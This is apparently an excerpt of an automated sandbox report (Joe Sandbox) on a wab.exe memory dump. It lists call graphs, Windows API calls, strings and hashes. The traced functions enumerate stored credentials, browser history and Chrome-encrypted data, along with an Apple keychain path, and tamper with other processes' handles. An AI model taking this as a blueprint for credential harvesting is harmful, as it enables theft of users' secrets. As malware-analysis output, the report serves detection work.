memset 40370 43ae73 40369->40370 40533 42e1c0 147 API calls 40370->40533 40371 43adab 40530 438c4e 163 API calls 40371->40530 40372 43ad6c 40372->40334 40372->40371 40529 42370b memset memcpy memset 40372->40529 40376 43adcc 40531 440f84 12 API calls 40376->40531 40377 43ae96 40534 42e1c0 147 API calls 40377->40534 40380 43aea8 40381 43aec1 40380->40381 40535 42e199 147 API calls 40380->40535 40382 43af00 40381->40382 40536 42e1c0 147 API calls 40381->40536 40382->40334 40386 43af1a 40382->40386 40387 43b3d9 40382->40387 40537 438eed 16 API calls 40386->40537 40392 43b3f6 40387->40392 40396 43b4c8 40387->40396 40388 43b60f 40388->40334 40596 4393a5 17 API calls 40388->40596 40391 43af2f 40538 4233c5 16 API calls 40391->40538 40578 432878 12 API calls 40392->40578 40394 43af51 40539 423426 11 API calls 40394->40539 40402 43b4f2 40396->40402 40584 42bbd5 memcpy memcpy memcpy memset memcpy 40396->40584 40398 43af7d 40540 423426 11 API calls 40398->40540 40585 43a76c 21 API calls 40402->40585 40403 43b529 40586 44081d 163 API calls 40403->40586 40404 43b462 40580 423330 11 API calls 40404->40580 40405 43af94 40541 423330 11 API calls 40405->40541 40409 43afca 40542 423330 11 API calls 40409->40542 40410 43b47e 40414 43b497 40410->40414 40581 42374a memcpy memset memcpy memcpy memcpy 40410->40581 40411 43b544 40415 43b55c 40411->40415 40587 42c02e memset 40411->40587 40412 43b428 40412->40404 40579 432b60 16 API calls 40412->40579 40582 4233ae 11 API calls 40414->40582 40588 43a87a 163 API calls 40415->40588 40417 43afdb 40543 4233ae 11 API calls 40417->40543 40422 43b56c 40426 43b58a 40422->40426 40589 423330 11 API calls 40422->40589 40423 43b4b1 40583 423399 11 API calls 40423->40583 40425 43afee 40544 44081d 163 API calls 40425->40544 40590 440f84 12 API calls 40426->40590 40427 43b4c1 40592 42db80 163 API calls 40427->40592 40432 43b592 40591 43a82f 16 API calls 40432->40591 40435 43b5b4 40593 438c4e 163 API calls 40435->40593 40437 43b5cf 40594 42c02e memset 
40437->40594 40439 43b005 40439->40334 40443 43b01f 40439->40443 40545 42d836 163 API calls 40439->40545 40440 43b1ef 40555 4233c5 16 API calls 40440->40555 40443->40440 40553 423330 11 API calls 40443->40553 40554 42d71d 163 API calls 40443->40554 40444 43b212 40556 423330 11 API calls 40444->40556 40446 43b087 40546 4233ae 11 API calls 40446->40546 40447 43add4 40447->40388 40595 438f86 16 API calls 40447->40595 40450 43b22a 40557 42ccb5 11 API calls 40450->40557 40453 43b23f 40558 4233ae 11 API calls 40453->40558 40454 43b10f 40549 423330 11 API calls 40454->40549 40456 43b257 40559 4233ae 11 API calls 40456->40559 40460 43b129 40550 4233ae 11 API calls 40460->40550 40461 43b26e 40560 4233ae 11 API calls 40461->40560 40464 43b09a 40464->40454 40547 42cc15 19 API calls 40464->40547 40548 4233ae 11 API calls 40464->40548 40465 43b282 40561 43a87a 163 API calls 40465->40561 40467 43b13c 40551 440f84 12 API calls 40467->40551 40469 43b29d 40562 423330 11 API calls 40469->40562 40472 43b15f 40552 4233ae 11 API calls 40472->40552 40473 43b2af 40474 43b2b8 40473->40474 40475 43b2ce 40473->40475 40563 4233ae 11 API calls 40474->40563 40564 440f84 12 API calls 40475->40564 40479 43b2c9 40566 4233ae 11 API calls 40479->40566 40480 43b2da 40565 42370b memset memcpy memset 40480->40565 40483 43b2f9 40567 423330 11 API calls 40483->40567 40485 43b30b 40568 423330 11 API calls 40485->40568 40487 43b325 40569 423399 11 API calls 40487->40569 40489 43b332 40570 4233ae 11 API calls 40489->40570 40491 43b354 40571 423399 11 API calls 40491->40571 40493 43b364 40572 43a82f 16 API calls 40493->40572 40495 43b370 40573 42db80 163 API calls 40495->40573 40497 43b380 40574 438c4e 163 API calls 40497->40574 40499 43b39e 40575 423399 11 API calls 40499->40575 40501 43b3ae 40576 43a76c 21 API calls 40501->40576 40503 43b3c3 40577 423399 11 API calls 40503->40577 40505->40326 40506->40328 40507->40331 40509 43a6f5 40508->40509 40510 43a765 40508->40510 40509->40510 40597 42a115 

                                                  Control-flow Graph

                                                  control_flow_graph 338 40dd85-40ddeb memset call 409bca CreateFileW 341 40ddf1-40de09 call 40afcf call 41352f 338->341 346 40de0b-40de1a NtQuerySystemInformation 341->346 347 40de1c 341->347 348 40de20-40de27 346->348 347->348 349 40de29-40de39 348->349 350 40de3b-40de52 FindCloseChangeNotification GetCurrentProcessId 348->350 349->341 349->350 351 40de54-40de58 350->351 352 40de7a-40de8e call 413cfa call 413d4c 350->352 351->352 354 40de5a 351->354 362 40de94-40debb call 40e6ad call 409c52 _wcsicmp 352->362 363 40e00c-40e01b call 413d29 352->363 356 40de5d-40de63 354->356 358 40de74-40de78 356->358 359 40de65-40de6c 356->359 358->352 358->356 359->358 361 40de6e-40de71 359->361 361->358 370 40dee7-40def7 OpenProcess 362->370 371 40debd-40dece _wcsicmp 362->371 373 40dff8-40dffb 370->373 374 40defd-40df02 370->374 371->370 372 40ded0-40dee1 _wcsicmp 371->372 372->370 375 40dffd-40e006 372->375 373->363 373->375 376 40df08 374->376 377 40dfef-40dff2 CloseHandle 374->377 375->362 375->363 378 40df0b-40df10 376->378 377->373 379 40df16-40df1d 378->379 380 40dfbd-40dfcb 378->380 379->380 381 40df23-40df4a GetCurrentProcess DuplicateHandle 379->381 380->378 382 40dfd1-40dfd3 380->382 381->380 383 40df4c-40df76 memset call 41352f 381->383 382->377 386 40df78-40df8a 383->386 387 40df8f-40dfbb CloseHandle call 409c52 * 2 _wcsicmp 383->387 386->387 387->380 392 40dfd5-40dfed 387->392 392->377
                                                  APIs
                                                  • memset.MSVCRT ref: 0040DDAD
                                                    • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,0040DDBE,?,?,00000000,00000208,000000FF,00000000,00000104), ref: 00409BD5
                                                  • CreateFileW.KERNELBASE(?,80000000,00000003,00000000,00000003,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DDD4
                                                    • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                                                    • Part of subcall function 0041352F: GetModuleHandleW.KERNEL32(ntdll.dll,-00000108,0040DE02,?,000000FF,00000000,00000104), ref: 00413542
                                                    • Part of subcall function 0041352F: GetProcAddress.KERNEL32(00000000,NtQuerySystemInformation), ref: 00413559
                                                    • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtLoadDriver), ref: 0041356B
                                                    • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtUnloadDriver), ref: 0041357D
                                                    • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtOpenSymbolicLinkObject), ref: 0041358F
                                                    • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtQuerySymbolicLinkObject), ref: 004135A1
                                                    • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtQueryObject), ref: 004135B3
                                                    • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtSuspendProcess), ref: 004135C5
                                                    • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtResumeProcess), ref: 004135D7
                                                  • NtQuerySystemInformation.NTDLL(00000010,00000104,00001000,00000000,?,000000FF,00000000,00000104), ref: 0040DE15
                                                  • FindCloseChangeNotification.KERNELBASE(C0000004,?,000000FF,00000000,00000104), ref: 0040DE3E
                                                  • GetCurrentProcessId.KERNEL32(?,000000FF,00000000,00000104), ref: 0040DE49
                                                  • _wcsicmp.MSVCRT ref: 0040DEB2
                                                  • _wcsicmp.MSVCRT ref: 0040DEC5
                                                  • _wcsicmp.MSVCRT ref: 0040DED8
                                                  • OpenProcess.KERNEL32(00000040,00000000,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DEEC
                                                  • GetCurrentProcess.KERNEL32(C0000004,80000000,00000000,00000002,?,000000FF,00000000,00000104), ref: 0040DF32
                                                  • DuplicateHandle.KERNELBASE(00000104,?,00000000,?,000000FF,00000000,00000104), ref: 0040DF41
                                                  • memset.MSVCRT ref: 0040DF5F
                                                  • CloseHandle.KERNEL32(C0000004,?,?,?,?,000000FF,00000000,00000104), ref: 0040DF92
                                                  • _wcsicmp.MSVCRT ref: 0040DFB2
                                                  • CloseHandle.KERNEL32(00000104,?,000000FF,00000000,00000104), ref: 0040DFF2
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.216342952571.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: AddressProc$Handle_wcsicmp$CloseProcess$CurrentFileModulememset$??2@ChangeCreateDuplicateFindInformationNameNotificationOpenQuerySystem
                                                  • String ID: dllhost.exe$taskhost.exe$taskhostex.exe
                                                  • API String ID: 594330280-3398334509
                                                  • Opcode ID: c0cdbd66bb0eb3cac082432fda8d0328b9155cc6ebf5e989b7bcc70ed293d7d6
                                                  • Instruction ID: 75e999e9478e2cd8c236028a88c267773407d5e0538ee9298daa3020847ac7a6
                                                  • Opcode Fuzzy Hash: c0cdbd66bb0eb3cac082432fda8d0328b9155cc6ebf5e989b7bcc70ed293d7d6
                                                  • Instruction Fuzzy Hash: 57818F71D00209AFEB10EF95CC81AAEBBB5FF04345F20407AF915B6291DB399E95CB58

                                                  Control-flow Graph

                                                  control_flow_graph 577 413d4c-413da0 call 40b633 CreateToolhelp32Snapshot memset Process32FirstW 580 413f00-413f11 Process32NextW 577->580 581 413da5-413ded OpenProcess 580->581 582 413f17-413f24 FindCloseChangeNotification 580->582 583 413eb0-413eb5 581->583 584 413df3-413e26 memset call 413f27 581->584 583->580 585 413eb7-413ebd 583->585 592 413e79-413e9d call 413959 call 413ca4 584->592 593 413e28-413e35 584->593 587 413ec8-413eda call 4099f4 585->587 588 413ebf-413ec6 ??3@YAXPAX@Z 585->588 590 413edb-413ee2 587->590 588->590 598 413ee4 590->598 599 413ee7-413efe 590->599 604 413ea2-413eae CloseHandle 592->604 596 413e61-413e68 593->596 597 413e37-413e44 GetModuleHandleW 593->597 596->592 600 413e6a-413e76 596->600 597->596 602 413e46-413e5c GetProcAddress 597->602 598->599 599->580 600->592 602->596 604->583
                                                  APIs
                                                    • Part of subcall function 0040B633: ??3@YAXPAX@Z.MSVCRT ref: 0040B63A
                                                  • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00413D6A
                                                  • memset.MSVCRT ref: 00413D7F
                                                  • Process32FirstW.KERNEL32(00000000,?), ref: 00413D9B
                                                  • OpenProcess.KERNEL32(00000410,00000000,?,?,?,?), ref: 00413DE0
                                                  • memset.MSVCRT ref: 00413E07
                                                  • GetModuleHandleW.KERNEL32(kernel32.dll,00000000,?), ref: 00413E3C
                                                  • GetProcAddress.KERNEL32(00000000,QueryFullProcessImageNameW), ref: 00413E56
                                                  • CloseHandle.KERNEL32(?,?,?,?,00000000,?), ref: 00413EA8
                                                  • ??3@YAXPAX@Z.MSVCRT ref: 00413EC1
                                                  • Process32NextW.KERNEL32(00000000,0000022C), ref: 00413F0A
                                                  • FindCloseChangeNotification.KERNELBASE(00000000,00000000,0000022C), ref: 00413F1A
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.216342952571.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: ??3@CloseHandleProcess32memset$AddressChangeCreateFindFirstModuleNextNotificationOpenProcProcessSnapshotToolhelp32
                                                  • String ID: QueryFullProcessImageNameW$kernel32.dll
                                                  • API String ID: 2191996607-1740548384
                                                  • Opcode ID: d01459b62e4562fe598c3dda65fe2a12e31c3c57d7bea03f0a3dc75513a8eb61
                                                  • Instruction ID: a891ebf292d3308fa7e32b9fbc5d589fb36fb38cf1b6cbdc37d41f3709903cdc
                                                  • Opcode Fuzzy Hash: d01459b62e4562fe598c3dda65fe2a12e31c3c57d7bea03f0a3dc75513a8eb61
                                                  • Instruction Fuzzy Hash: B4518FB2C00218ABDB10DF5ACC84ADEF7B9AF95305F1041ABE509A3251D7795F84CFA9
                                                  APIs
                                                  • GetModuleHandleW.KERNEL32(00000000,00000000,?,?), ref: 0040B5A5
                                                  • FindResourceW.KERNELBASE(00000000,00000032,BIN), ref: 0040B5B6
                                                  • LoadResource.KERNEL32(00000000,00000000), ref: 0040B5C4
                                                  • SizeofResource.KERNEL32(?,00000000), ref: 0040B5D4
                                                  • LockResource.KERNEL32(00000000), ref: 0040B5DD
                                                  • memcpy.MSVCRT ref: 0040B60D
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.216342952571.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: Resource$FindHandleLoadLockModuleSizeofmemcpy
                                                  • String ID: BIN
                                                  • API String ID: 1668488027-1015027815
                                                  APIs
                                                  • FindFirstFileW.KERNELBASE(?,?,?,00000000,00445F58,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AE67
                                                  • FindNextFileW.KERNELBASE(?,?,?,00000000,00445F58,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AE83
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.216342952571.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: FileFind$FirstNext
                                                  • String ID:
                                                  • API String ID: 1690352074-0
                                                  APIs
                                                  • memset.MSVCRT ref: 0041898C
                                                  • GetSystemInfo.KERNELBASE(004725C0,?,00000000,004439D6,?,00445FAE,?,?,?,?,?,?), ref: 00418995
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.216342952571.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: InfoSystemmemset
                                                  • String ID:
                                                  • API String ID: 3558857096-0

                                                  Control-flow Graph

                                                  APIs
                                                  • memset.MSVCRT ref: 004455C2
                                                  • wcsrchr.MSVCRT ref: 004455DA
                                                  • memset.MSVCRT ref: 0044570D
                                                  • memset.MSVCRT ref: 00445725
                                                    • Part of subcall function 0040C768: _wcslwr.MSVCRT ref: 0040C817
                                                    • Part of subcall function 0040C768: wcslen.MSVCRT ref: 0040C82C
                                                    • Part of subcall function 0040BDB0: CredEnumerateW.ADVAPI32(00000000,00000000,?,?,?,00000000,?), ref: 0040BDE9
                                                    • Part of subcall function 0040BDB0: wcslen.MSVCRT ref: 0040BE06
                                                    • Part of subcall function 0040BDB0: _wcsncoll.MSVCRT ref: 0040BE38
                                                    • Part of subcall function 0040BDB0: memset.MSVCRT ref: 0040BE91
                                                    • Part of subcall function 0040BDB0: memcpy.MSVCRT ref: 0040BEB2
                                                    • Part of subcall function 004135F7: GetProcAddress.KERNEL32(?,00000000), ref: 0041362A
                                                  • memset.MSVCRT ref: 0044573D
                                                  • memset.MSVCRT ref: 00445755
                                                  • memset.MSVCRT ref: 004458CB
                                                  • memset.MSVCRT ref: 004458E3
                                                  • memset.MSVCRT ref: 0044596E
                                                  • memset.MSVCRT ref: 00445A10
                                                  • memset.MSVCRT ref: 00445A28
                                                  • memset.MSVCRT ref: 00445AC6
                                                    • Part of subcall function 00445093: GetFileSize.KERNEL32(00000000,00000000,?,00000000,00000104,00445E7E,?,?,?,?,00000104), ref: 004450AA
                                                    • Part of subcall function 00445093: ??2@YAPAXI@Z.MSVCRT ref: 004450BE
                                                    • Part of subcall function 00445093: memset.MSVCRT ref: 004450CD
                                                    • Part of subcall function 00445093: ??3@YAXPAX@Z.MSVCRT ref: 004450F0
                                                    • Part of subcall function 00445093: CloseHandle.KERNEL32(00000000,?,?,00000104), ref: 004450F7
                                                  • memset.MSVCRT ref: 00445B52
                                                  • memset.MSVCRT ref: 00445B6A
                                                  • memset.MSVCRT ref: 00445C9B
                                                  • memset.MSVCRT ref: 00445CB3
                                                  • _wcsicmp.MSVCRT ref: 00445D56
                                                  • memset.MSVCRT ref: 00445B82
                                                    • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B71C
                                                    • Part of subcall function 0040B6EF: wcsrchr.MSVCRT ref: 0040B738
                                                    • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B756
                                                    • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B7F5
                                                    • Part of subcall function 0040B6EF: CreateFileW.KERNELBASE(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C
                                                    • Part of subcall function 0040ADD4: wcscmp.MSVCRT ref: 0040ADF3
                                                    • Part of subcall function 0040ADD4: wcscmp.MSVCRT ref: 0040AE04
                                                  • memset.MSVCRT ref: 00445986
                                                    • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                    • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                    • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                    • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                    • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.216342952571.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: memset$wcslen$File$wcscmpwcsrchr$??2@??3@AddressAttributesCloseCreateCredEnumerateHandleProcSize_wcsicmp_wcslwr_wcsncollmemcpywcscatwcscpy
                                                  • String ID: *.*$Apple Computer\Preferences\keychain.plist
                                                  • API String ID: 2745753283-3798722523

                                                  Control-flow Graph

                                                  APIs
                                                    • Part of subcall function 004044A4: LoadLibraryW.KERNEL32(comctl32.dll), ref: 004044C3
                                                    • Part of subcall function 004044A4: GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 004044D5
                                                    • Part of subcall function 004044A4: FreeLibrary.KERNEL32(00000000), ref: 004044E9
                                                    • Part of subcall function 004044A4: MessageBoxW.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404514
                                                  • SetErrorMode.KERNELBASE(00008001), ref: 00412799
                                                  • GetModuleHandleW.KERNEL32(00000000,0041493C,00000000), ref: 004127B2
                                                  • EnumResourceTypesW.KERNEL32(00000000), ref: 004127B9
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.216342952571.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: Library$AddressEnumErrorFreeHandleLoadMessageModeModuleProcResourceTypes
                                                  • String ID: $/deleteregkey$/savelangfile
                                                  • API String ID: 2744995895-28296030

                                                  Control-flow Graph

                                                  APIs
                                                  • memset.MSVCRT ref: 0040B71C
                                                    • Part of subcall function 00409C70: wcscpy.MSVCRT ref: 00409C75
                                                    • Part of subcall function 00409C70: wcsrchr.MSVCRT ref: 00409C7D
                                                  • wcsrchr.MSVCRT ref: 0040B738
                                                  • memset.MSVCRT ref: 0040B756
                                                  • memset.MSVCRT ref: 0040B7F5
                                                  • CreateFileW.KERNELBASE(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C
                                                  • CopyFileW.KERNEL32(00445FAE,?,00000000,?,?), ref: 0040B82D
                                                  • FindCloseChangeNotification.KERNELBASE(00000000,?,?), ref: 0040B838
                                                  • memset.MSVCRT ref: 0040B851
                                                  • memset.MSVCRT ref: 0040B8CA
                                                  • memcmp.MSVCRT ref: 0040B9BF
                                                    • Part of subcall function 00404423: GetProcAddress.KERNEL32(?,00000000), ref: 00404453
                                                    • Part of subcall function 00404423: FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
                                                  • DeleteFileW.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 0040BAE5
                                                  • memset.MSVCRT ref: 0040BB53
                                                  • memcpy.MSVCRT ref: 0040BB66
                                                  • LocalFree.KERNEL32(00000000,?,?,?,00000000,00000000,?), ref: 0040BB8D
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.216342952571.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: memset$File$Freewcsrchr$AddressChangeCloseCopyCreateDeleteFindLibraryLocalNotificationProcmemcmpmemcpywcscpy
                                                  • String ID: chp$v10
                                                  • API String ID: 170802307-2783969131

                                                  Control-flow Graph

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.216342952571.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: memcpy$memcmp$ByteCharMultiWidememset
                                                  • String ID:
                                                  • API String ID: 3715365532-3916222277

                                                  Control-flow Graph

                                                  APIs
                                                    • Part of subcall function 0040DD85: memset.MSVCRT ref: 0040DDAD
                                                    • Part of subcall function 0040DD85: CreateFileW.KERNELBASE(?,80000000,00000003,00000000,00000003,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DDD4
                                                    • Part of subcall function 0040DD85: NtQuerySystemInformation.NTDLL(00000010,00000104,00001000,00000000,?,000000FF,00000000,00000104), ref: 0040DE15
                                                    • Part of subcall function 0040DD85: FindCloseChangeNotification.KERNELBASE(C0000004,?,000000FF,00000000,00000104), ref: 0040DE3E
                                                    • Part of subcall function 0040DD85: GetCurrentProcessId.KERNEL32(?,000000FF,00000000,00000104), ref: 0040DE49
                                                    • Part of subcall function 0040DD85: _wcsicmp.MSVCRT ref: 0040DEB2
                                                    • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                                                  • OpenProcess.KERNEL32(00000040,00000000,00000000,00000104,?,00000000,00000104,?,00000000,00000104,00000000), ref: 0040E093
                                                  • GetCurrentProcess.KERNEL32(?,80000000,00000000,00000000), ref: 0040E0B2
                                                  • DuplicateHandle.KERNELBASE(?,00000104,00000000), ref: 0040E0BF
                                                  • GetFileSize.KERNEL32(?,00000000), ref: 0040E0D4
                                                    • Part of subcall function 00409A45: GetTempPathW.KERNEL32(00000104,?,00445FAE), ref: 00409A5C
                                                    • Part of subcall function 00409A45: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00409A6E
                                                    • Part of subcall function 00409A45: GetTempFileNameW.KERNELBASE(?,0040B827,00000000,?), ref: 00409A85
                                                    • Part of subcall function 004096DC: CreateFileW.KERNELBASE(00000001,40000000,00000001,00000000,00000002,00000000,00000000,0040E0F1,00000104), ref: 004096EE
                                                  • CreateFileMappingW.KERNELBASE(?,00000000,00000002,00000000,00000000,00000000), ref: 0040E0FE
                                                  • MapViewOfFile.KERNELBASE(00000000,00000004,00000000,00000000,00000104), ref: 0040E113
                                                  • WriteFile.KERNELBASE(00000000,00000000,00000104,0040E6A3,00000000), ref: 0040E12E
                                                  • UnmapViewOfFile.KERNEL32(00000000), ref: 0040E135
                                                  • FindCloseChangeNotification.KERNELBASE(?), ref: 0040E13E
                                                  • CloseHandle.KERNEL32(00000000), ref: 0040E143
                                                  • CloseHandle.KERNEL32(?), ref: 0040E148
                                                  • CloseHandle.KERNEL32(?), ref: 0040E14D
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.216342952571.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: File$Close$Handle$CreateProcess$ChangeCurrentFindNotificationTempView$??2@DirectoryDuplicateInformationMappingNameOpenPathQuerySizeSystemUnmapWindowsWrite_wcsicmpmemset
                                                  • String ID: bhv
                                                  • API String ID: 327780389-2689659898

                                                  Control-flow Graph

                                                  APIs
                                                    • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                    • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                    • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                    • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                    • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                    • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                  • GetProcAddress.KERNEL32(00000000,psapi.dll), ref: 00413F6F
                                                  • GetProcAddress.KERNEL32(?,EnumProcessModules), ref: 00413F7B
                                                  • GetProcAddress.KERNEL32(?,GetModuleFileNameExW), ref: 00413F87
                                                  • GetProcAddress.KERNEL32(?,EnumProcesses), ref: 00413F93
                                                  • GetProcAddress.KERNEL32(?,GetModuleInformation), ref: 00413F9F
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.216342952571.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: AddressProc$LibraryLoad$DirectorySystemmemsetwcscatwcscpy
                                                  • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameW$GetModuleFileNameExW$GetModuleInformation$psapi.dll
                                                  • API String ID: 2941347001-70141382

                                                  Control-flow Graph

                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.216342952571.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: HandleModule_initterm$InfoStartup__p__commode__p__fmode__set_app_type__setusermatherr__wgetmainargs_cexitexit
                                                  • String ID:
                                                  • API String ID: 2827331108-0
                                                  • Opcode ID: 7ba7b2652c13871cd0d5cae79e0f4a701fe2602556b2c3d333f15f3a91922bbb
                                                  • Instruction ID: 0e3254bf032efe29fc581ce6ca9889a5a3d5d0d8e47fd2ea34fa35870f4f4cb9
                                                  • Opcode Fuzzy Hash: 7ba7b2652c13871cd0d5cae79e0f4a701fe2602556b2c3d333f15f3a91922bbb
                                                  • Instruction Fuzzy Hash: 9D51C474C41314DFEB21AF65D8499AD7BB0FB0A715F21452BE82197291D7788C82CF1E

                                                  APIs
                                                  • memset.MSVCRT ref: 0040C298
                                                    • Part of subcall function 0040E5ED: memset.MSVCRT ref: 0040E60F
                                                    • Part of subcall function 0040E5ED: memset.MSVCRT ref: 0040E629
                                                    • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                                                  • FindFirstUrlCacheEntryW.WININET(visited:,?,80000001), ref: 0040C30D
                                                  • wcschr.MSVCRT ref: 0040C324
                                                  • wcschr.MSVCRT ref: 0040C344
                                                  • FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C369
                                                  • GetLastError.KERNEL32 ref: 0040C373
                                                  • FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C39F
                                                  • FindCloseUrlCache.WININET(?), ref: 0040C3B0
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.216342952571.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: CacheFind$Entrymemset$Nextwcschr$??2@CloseErrorFirstLast
                                                  • String ID: visited:
                                                  • API String ID: 1157525455-1702587658
                                                  • Opcode ID: e6e827466474dba504c602eadc9ccabadb05f86476a5423d269347cfbfdac146
                                                  • Instruction ID: 6629d855392f08d41decd2a192e4b6579142cf3eaa95f33c860a05aa0b18639b
                                                  • Opcode Fuzzy Hash: e6e827466474dba504c602eadc9ccabadb05f86476a5423d269347cfbfdac146
                                                  • Instruction Fuzzy Hash: DA417F71D00219ABDB10EF92DC85AEFBBB8FF45714F10416AE904F7281D7389A45CBA9

                                                  APIs
                                                    • Part of subcall function 00406B90: _wcsicmp.MSVCRT ref: 00406BC1
                                                  • memset.MSVCRT ref: 0040E1BD
                                                    • Part of subcall function 00406E8F: memset.MSVCRT ref: 00406F8B
                                                  • ??3@YAXPAX@Z.MSVCRT ref: 0040E28B
                                                    • Part of subcall function 0040DD50: _wcsicmp.MSVCRT ref: 0040DD69
                                                    • Part of subcall function 0040AAE3: wcslen.MSVCRT ref: 0040AAF2
                                                    • Part of subcall function 0040AAE3: _memicmp.MSVCRT ref: 0040AB20
                                                  • _snwprintf.MSVCRT ref: 0040E257
                                                    • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
